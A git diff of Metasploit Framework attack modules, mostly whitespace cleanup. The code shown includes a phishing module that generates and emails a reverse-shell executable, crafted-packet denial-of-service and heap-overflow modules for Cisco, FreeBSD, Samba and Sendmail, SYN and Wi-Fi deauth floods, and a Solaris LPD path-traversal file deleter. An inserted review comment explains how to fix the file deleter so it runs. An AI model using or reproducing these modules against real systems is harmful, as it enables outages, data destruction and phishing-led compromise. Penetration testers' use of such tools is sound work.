@@ -77,35 +80,35 @@ class Metasploit3 < Msf::Auxiliary datastore['MAILFROM'] = from - + msg = File.open(msg_file).read email_sig = File.open(sig_file).read - if (type !~ /text/i and type !~ /text\/html/i) + if (type !~ /text/i and type !~ /text\/html/i) print_error("YAML config: #{type}") end - - if make_payload + + if make_payload print_status("Creating payload...") system( "#{msf_location}/msfpayload #{msf_payload} LHOST=#{msf_ip} LPORT=#{msf_port} R | #{msf_location}/msfencode -t exe -o /tmp/#{msf_filename} > /dev/null 2>&1") - if msf_change_ext + if msf_change_ext msf_payload_newext = msf_filename msf_payload_newext = msf_payload_newext.sub(/\.\w+$/, ".#{msf_payload_ext}") File.rename("/tmp/#{msf_filename}", "/tmp/#{msf_payload_newext}") msf_filename = msf_payload_newext end - if zip_payload + if zip_payload zip_file = msf_filename zip_file = zip_file.gsub(/\.\w+/, '.zip') system("zip -r /tmp/#{zip_file} /tmp/#{msf_filename} > /dev/null 2>&1"); msf_filename = zip_file attachment_file_type = 'application/zip' - else + else attachment_file_type = 'application/exe' end @@ -118,17 +121,17 @@ class Metasploit3 < Msf::Auxiliary if l !~ /\@/ nil end - + nem = l.split(',') name = nem[0].split(' ') fname = name[0] lname = name[1] email = nem[1] - - - if add_name - email_msg_body = "#{fname},\n\n#{msg}" - else + + + if add_name + email_msg_body = "#{fname},\n\n#{msg}" + else email_msg_body = msg end @@ -136,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary data_sig = File.open(sig_file).read email_msg_body = "#{email_msg_body}\n#{data_sig}" end - + print_status("Emailing #{name[0]} #{name[1]} at #{email}") mime_msg = Rex::MIME::Message.new 
@@ -146,22 +149,20 @@ class Metasploit3 < Msf::Auxiliary mime_msg.to = email datastore['MAILTO'] = email.strip mime_msg.subject = subject - + mime_msg.add_part(Rex::Text.encode_base64(email_msg_body, "\r\n"), type, "base64", "inline") - + if attachment if attachment_file_name data_attachment = File.open(attachment_file).read mime_msg.add_part(Rex::Text.encode_base64(data_attachment, "\r\n"), attachment_file_type, "base64", "attachment; filename=\"#{attachment_file_name}\"") end end - + send_message(mime_msg.to_s) - sleep wait + sleep wait end - + print_status("Email sent..") end - end - - +end diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index ee9be92937..66778c887b 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,12 +17,12 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Cisco IOS HTTP GET /%% request Denial of Service', 'Description' => %q{ - This module triggers a Denial of Service condition in the Cisco IOS + This module triggers a Denial of Service condition in the Cisco IOS HTTP server. By sending a GET request for "/%%", the device becomes unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.2(18)P. @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary [ Opt::RPORT(80), ], self.class) - + end def run 
diff --git a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb index 759f1edb24..1eec6bba13 100644 --- a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb +++ b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,12 +17,12 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'FreeBSD Remote NFS RPC Request Denial of Service', 'Description' => %q{ - This module sends a specially-crafted NFS Mount request causing a + This module sends a specially-crafted NFS Mount request causing a kernel panic on host running FreeBSD 6.0. }, 'Author' => [ 'MC' ], @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary [ 'OSVDB', '23511' ], [ 'CVE', '2006-0900' ], ])) - + register_options([Opt::RPORT(2049),], self.class) end @@ -45,11 +45,11 @@ class Metasploit3 < Msf::Auxiliary pkt = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" pkt << "\x00\x01\x86\xa5\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00" pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" - + print_status("Sending dos packet...") - + sock.put(pkt) - + disconnect end diff --git a/modules/auxiliary/dos/http/3com_superstack_switch.rb b/modules/auxiliary/dos/http/3com_superstack_switch.rb index b684dfdb35..df1268012d 100644 --- a/modules/auxiliary/dos/http/3com_superstack_switch.rb +++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => '3Com SuperStack Switch Denial of Service', 'Description' => %q{ This module causes a temporary denial of service condition @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ], ], 'DisclosureDate' => 'Jun 24 2004')) - + register_options( [ Opt::RPORT(80) ], self.class ) end @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Errno::ECONNRESET print_status("DoS packet successful. #{rhost} not responding.") end - + end -end \ No newline at end of file +end diff --git a/modules/auxiliary/dos/http/apache_mod_isapi.rb b/modules/auxiliary/dos/http/apache_mod_isapi.rb index 7f9bf9df3c..b011f6f0dd 100644 --- a/modules/auxiliary/dos/http/apache_mod_isapi.rb +++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb 
@@ -15,27 +15,27 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Apache mod_isapi <= 2.2.14 Dangling Pointer', 'Description' => %q{ This module triggers a use-after-free vulnerability in the Apache Software - Foundation mod_isapi extension. In order to reach the vulnerable code, the + Foundation mod_isapi extension. In order to reach the vulnerable code, the target server must have an ISAPI module installed and configured. By making a request that terminates abnormally (either an aborted TCP connection or an unsatisfied chunked request), mod_isapi will unload the ISAPI extension. Later, - if another request comes for that ISAPI module, previously obtained pointers will + if another request comes for that ISAPI module, previously obtained pointers will be used resulting in an access violation or potentially arbitrary code execution. - Although arbitrary code execution is theoretically possible, a real-world method of + Although arbitrary code execution is theoretically possible, a real-world method of invoking this consequence has not been proven. In order to do so, one would need to find a situation where a particular ISAPI module loads at an image base address that can be re-allocated by a remote attacker. Limited success was encountered using two separate ISAPI modules. In this scenario, - a second ISAPI module was loaded into the same memory area as the previously + a second ISAPI module was loaded into the same memory area as the previously unloaded module. }, 'Author' => diff --git a/modules/auxiliary/dos/http/dell_openmanage_post.rb b/modules/auxiliary/dos/http/dell_openmanage_post.rb index e5c3f75be8..9e7c873b28 100644 --- a/modules/auxiliary/dos/http/dell_openmanage_post.rb +++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,10 +19,10 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)', 'Description' => %q{ - This module exploits a heap overflow in the Dell OpenManage + This module exploits a heap overflow in the Dell OpenManage Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability exists due to a boundary error within the handling of POST requests, where the application input is set to an overly long file name. @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary [ 'CVE', '2004-0331' ], ], 'DisclosureDate' => 'Feb 26 2004')) - + register_options( [ Opt::RPORT(1311), @@ -63,4 +63,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end \ No newline at end of file +end diff --git a/modules/auxiliary/dos/http/webrick_regex.rb b/modules/auxiliary/dos/http/webrick_regex.rb index 5b19cfb8f4..4bf02116cd 100644 --- a/modules/auxiliary/dos/http/webrick_regex.rb +++ b/modules/auxiliary/dos/http/webrick_regex.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' 
@@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS', 'Description' => %q{ The WEBrick::HTTP::DefaultFileHandler in WEBrick in @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Request sent to #{rhost}:#{rport}") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_status("Couldn't connect to #{rhost}:#{rport}") - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end end end diff --git a/modules/auxiliary/dos/mdns/avahi_portzero.rb b/modules/auxiliary/dos/mdns/avahi_portzero.rb index a1aeccfd03..5eeefcd9f6 100644 --- a/modules/auxiliary/dos/mdns/avahi_portzero.rb +++ b/modules/auxiliary/dos/mdns/avahi_portzero.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -27,9 +27,9 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => [ + 'References' => [ [ 'CVE', '2008-5081' ], - [ 'OSVDB', '50929' ], + [ 'OSVDB', '50929' ], ], 'DisclosureDate' => 'Nov 14 2008') @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary n.l3.id = 0xbeef n.l3.ttl = 128 n.l3.flags = 2 - + n.l4 = Racket::L4::UDP.new n.l4.src_port = 0 n.l4.dst_port = datastore['RPORT'].to_i diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb index 806dbfb0ba..50b4d0764a 100644 --- a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - include Msf::Auxiliary::Dos + include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Samba lsa_io_privilege_set Heap Overflow', 'Description' => %q{ This module triggers a heap overflow in the LSA RPC service @@ -35,18 +35,18 @@ class Metasploit3 < Msf::Auxiliary ['OSVDB', '34699'], ] )) - + register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']), ], self.class) - + end def run - + pipe = datastore['SMBPIPE'].downcase - + print_status("Connecting to the SMB service...") connect() smb_login() @@ -61,13 +61,13 @@ class Metasploit3 < Msf::Auxiliary # Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+) # Mac OS X: PC control via memcpy to stack ptr # Solaris: PC control via memcpy to stack ptr - + stub = lsa_open_policy(dcerpc) stub << NDR.long(1) stub << NDR.long(0xffffffff) stub << NDR.long(0x100) stub << "X" * 0x100 - + print_status("Calling the vulnerable function...") begin @@ -82,8 +82,8 @@ class Metasploit3 < Msf::Auxiliary raise e end end - - disconnect + + disconnect end end diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb index fbb24870fc..f6a23af077 100644 --- a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - include Msf::Auxiliary::Dos + include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Samba lsa_io_trans_names Heap Overflow', 'Description' => %q{ This module triggers a heap overflow in the LSA RPC service @@ -35,18 +35,18 @@ class Metasploit3 < Msf::Auxiliary ['OSVDB', '34699'], ] )) - + register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']), ], self.class) - + end def run - + pipe = datastore['SMBPIPE'].downcase - + print_status("Connecting to the SMB service...") connect() smb_login() @@ -82,10 +82,10 @@ class Metasploit3 < Msf::Auxiliary raise e end end - + dcerpc.call(0x0f, stub) - - disconnect + + disconnect end end diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb index e1e8fec8f5..530ac61dba 100644 --- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb +++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption', 'Description' => %q{ This is a proof of concept denial of service module for Sendmail versions diff --git a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index b006318db2..4ae9808aaf 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Solaris LPD Arbitrary File Delete', 'Description' => %q{ This module uses a vulnerability in the Solaris line printer @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary can be used to exploit the rpc.walld format string flaw, the missing krb5.conf authentication bypass, or simply delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10. - + }, 'Author' => [ 'hdm', 'Optyx ' ], 'License' => MSF_LICENSE, @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'], ] )) - + register_options( [ Opt::RPORT(515), 
@@ -49,21 +49,21 @@ class Metasploit3 < Msf::Auxiliary end def run - - + + r_hostname = Rex::Text.rand_text_alpha(rand(8)+1) r_user = Rex::Text.rand_text_alpha(rand(8)+1) r_spool = Rex::Text.rand_text_alpha(rand(8)+1) - + # Create a simple control file... control = "H#{r_hostname}\nP#{r_user}\n"; - + # The job ID is squashed down to three decimal digits jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0] # Establish the first connection to the server sock1 = connect(false) - + # Request a cascaded job sock1.put("\x02#{r_hostname}:#{r_spool}\n") res = sock1.get_once @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary print_status("The target did not accept our job request command") return end - + # Theoretically, we could delete multiple files at once, however # the lp daemon will append garbage from memory to the path name # if we don't stick a null byte after the path. Unfortunately, this @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n" dataf = Rex::Text.rand_text_alpha(100)+1 - + print_status("Deleting #{datstore['RPATH']}...") if !( send_file(sock1, 2, "cfA" + jid + r_hostname, control) and @@ -88,28 +88,28 @@ class Metasploit3 < Msf::Auxiliary sock1.close return end - + print_status("Successfully deleted #{datastore['RPATH']} >:-]") sock1.close end def send_file(s, type, name, data='') - + s.put(type.chr + data.length.to_s + " " + name + "\n") res = s.get_once(1) if !(res and res[0] == ?\0) print_status("The target did not accept our control file command (#{name})") return end - + s.put(data) s.put("\x00") res = s.get_once(1) if !(res and res[0] == ?\0) print_status("The target did not accept our control file data (#{name})") return - end - + end + print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length)) return true end diff --git a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb index eb9a5a7532..e346366d4d 100644 
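Review bot: The `@@ -79,7 +79,7 @@` hunk of cascade_delete.rb retains two context lines on the new side that cannot execute: `dataf = Rex::Text.rand_text_alpha(100)+1` adds an Integer to a String and raises TypeError, and the next statement `print_status("Deleting #{datstore['RPATH']}...")` misspells `datastore`, so it would raise NameError once the first line is repaired. Given the surrounding `rand_text_alpha(rand(8)+1)` calls earlier in `run`, the first line presumably meant `dataf = Rex::Text.rand_text_alpha(rand(100)+1)`; the second should read `print_status("Deleting #{datastore['RPATH']}...")`. Since this commit already touches that hunk for whitespace, fixing both here would avoid the module aborting before the control file is sent. The `run` method begins in the `@@ -49,21 +49,21 @@` hunk and part of its body lies between hunks, so the use of `dataf` further down is inferred rather than visible.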
--- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb +++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'todb', 'License' => MSF_LICENSE, - 'References' => + 'References' => [ ['BID', '37670'], ['OSVDB', '61538'], @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('SPORT', [false, 'Source port (defaults to random)']), OptAddress.new('SHOST', [false, 'Source address (defaults to random)']) ]) - + deregister_options('FILTER','PCAPFILE', 'SNAPLEN') end @@ -77,11 +77,10 @@ class Metasploit3 < Msf::Auxiliary n.l4.ack = 0 n.l4.seq = rand(0xffffffff) n.l4.add_option(101,"") - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') pkt = n.pack print_status("#{n.l3.dst_ip}:#{n.l4.dst_port} Sending TCP Syn packet from #{n.l3.src_ip}:#{n.l4.src_port}") capture_sendto(pkt,rhost) close_pcap end end - diff --git a/modules/auxiliary/dos/tcp/synflood.rb b/modules/auxiliary/dos/tcp/synflood.rb index afba5ba77a..d2f03b111a 100644 --- a/modules/auxiliary/dos/tcp/synflood.rb +++ b/modules/auxiliary/dos/tcp/synflood.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('SPORT', [false, 'The source port (else randomizes)']), OptInt.new('NUM', [false, 'Number of SYNs to send (else unlimited)']) ]) - + deregister_options('FILTER','PCAPFILE') end @@ -68,14 +68,14 @@ class Metasploit3 < Msf::Auxiliary while (num <= 0) or (sent < num) - n.l3.src_ip = srchost + n.l3.src_ip = srchost n.l3.id = rand(0x10000) - n.l3.ttl = rand(128)+128 + n.l3.ttl = rand(128)+128 n.l4.window = rand(4096)+1 n.l4.src_port = sport n.l4.seq = rand(0x100000000) - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') pkt = n.pack diff --git a/modules/auxiliary/dos/wifi/cts_rts_flood.rb b/modules/auxiliary/dos/wifi/cts_rts_flood.rb index 133b819349..19ebd19de3 100644 --- a/modules/auxiliary/dos/wifi/cts_rts_flood.rb +++ b/modules/auxiliary/dos/wifi/cts_rts_flood.rb @@ -1,18 +1,29 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Dos - + def initialize(info ={}) super(update_info(info, 'Name' => 'Wireless CTS/RTS Flooder', 'Description' => %q{ This module sends 802.11 CTS/RTS requests to a specific wireless peer, - using the specified source address, + using the specified source address, }, - + 'Author' => [ 'Brad Antoniewicz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' 
@@ -37,21 +48,21 @@ class Metasploit3 < Msf::Auxiliary when 'CTS' frame =create_cts() - else + else print_status("No TYPE selected!!") - return + return end - - open_wifi + + open_wifi print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frames.....") datastore['NUM'].to_i.times do wifi.write(frame) end - end + end def create_rts - + frame = "\xb4" + # Type/SubType "\x00" + # Flags @@ -62,8 +73,8 @@ class Metasploit3 < Msf::Auxiliary return frame end def create_cts - - frame = + + frame = "\xc4" + # Type/SubType "\x00" + # Flags "\xff\x7f" + # Duration diff --git a/modules/auxiliary/dos/wifi/daringphucball.rb b/modules/auxiliary/dos/wifi/daringphucball.rb index 661bffe9e8..32969e2338 100644 --- a/modules/auxiliary/dos/wifi/daringphucball.rb +++ b/modules/auxiliary/dos/wifi/daringphucball.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -19,21 +19,21 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption', 'Description' => %q{ The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs) - is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning + is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading to arbitrary code execution. This vulnerability is triggered when a probe response frame is received - that does not contain valid information element (IE) fields after the fixed-length header. The data - following the fixed-length header is copied over internal kernel structures, resulting in memory + that does not contain valid information element (IE) fields after the fixed-length header. The data + following the fixed-length header is copied over internal kernel structures, resulting in memory operations being performed on attacker-controlled pointer values. }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'References' => + 'References' => [ ['CVE', '2006-5710'], ['OSVDB', '30180'], @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary [ OptInt.new('COUNT', [ true, "The number of frames to send", 2000]), OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) - ], self.class) + ], self.class) end # 
@@ -54,38 +54,38 @@ class Metasploit3 < Msf::Auxiliary def run open_wifi - + cnt = datastore['COUNT'].to_i - print_status("Creating malicious probe response frame...") + print_status("Creating malicious probe response frame...") frame = create_frame() - + print_status("Sending #{cnt} frames...") cnt.times { wifi.write(frame) } end - + def create_frame bssid = Rex::Text.rand_text(6) seq = [rand(255)].pack('n') caps = [rand(65535)].pack('n') - - frame = + + frame = "\x50" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration eton(datastore['ADDR_DST']) + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value Rex::Text.rand_text(2) + # beacon interval Rex::Text.rand_text(2) # capabilities - + frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4) - + return frame - end + end end =begin diff --git a/modules/auxiliary/dos/wifi/deauth.rb b/modules/auxiliary/dos/wifi/deauth.rb index 5c0f96abe7..92d56dbc10 100644 --- a/modules/auxiliary/dos/wifi/deauth.rb +++ b/modules/auxiliary/dos/wifi/deauth.rb @@ -1,10 +1,21 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Dos - + def initialize(info ={}) super(update_info(info, 'Name' => 'Wireless DEAUTH Flooder', @@ -12,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary This module sends 802.11 DEAUTH requests to a specific wireless peer, using the specified source address and source BSSID. }, - + 'Author' => [ 'Brad Antoniewicz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' 
@@ -27,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary end def run - + print_status("Creating Deauth frame with the following attributes:") print_status("\tDST: #{datastore['ADDR_DST']}") print_status("\tSRC: #{datastore['ADDR_SRC']}") @@ -41,11 +52,11 @@ class Metasploit3 < Msf::Auxiliary wifi.write(create_deauth()) end close_wifi - end - + end + def create_deauth - - seq = [rand(255)].pack('n') + + seq = [rand(255)].pack('n') frame = "\xc0" + # Type/SubType "\x00" + # Flags @@ -53,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary eton(datastore['ADDR_DST']) + # dst addr eton(datastore['ADDR_SRC']) + # src addr eton(datastore['ADDR_BSS']) + # BSSID - seq + # sequence number + seq + # sequence number "\x07\x00" # Reason Code (nonassoc. sta) return frame end diff --git a/modules/auxiliary/dos/wifi/fakeap.rb b/modules/auxiliary/dos/wifi/fakeap.rb index 081512e2b8..6bf8b2be2d 100644 --- a/modules/auxiliary/dos/wifi/fakeap.rb +++ b/modules/auxiliary/dos/wifi/fakeap.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -20,18 +20,18 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Wireless Fake Access Point Beacon Flood', 'Description' => %q{ This module can advertise thousands of fake access points, using random SSIDs and BSSID addresses. Inspired by Black Alchemy's fakeap tool. }, - + 'Author' => [ 'hdm', 'kris katterjohn' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' - )) + )) register_options([ OptInt.new('NUM', [false, "Number of beacons to send"]), 
@@ -59,39 +59,39 @@ class Metasploit3 < Msf::Auxiliary bssid = Rex::Text.rand_text(6) end seq = [rand(255)].pack('n') - + "\x80" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration "\xff\xff\xff\xff\xff\xff" + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value "\x64\x00" + # beacon interval "\x00\x05" + # capability flags - + # ssid tag "\x00" + ssid.length.chr + ssid + - + # supported rates "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + - + # current channel - "\x03" + "\x01" + datastore['CHANNEL'].to_i.chr + - + "\x03" + "\x01" + datastore['CHANNEL'].to_i.chr + + # traffic indication map "\x05" + "\x04" + "\x00\x01\x02\x20" + - + # country information "\x07" + "\x06" + "\x55\x53\x20\x01\x0b\x12" + - + # erp information "\x2a" + "\x01" + "\x00" + - + # extended supported rates "\x32" + "\x04" + "\x12\x24\x60\x6c" end - + end diff --git a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb index c7b1557fb8..6fe2377082 100644 --- a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb +++ b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit 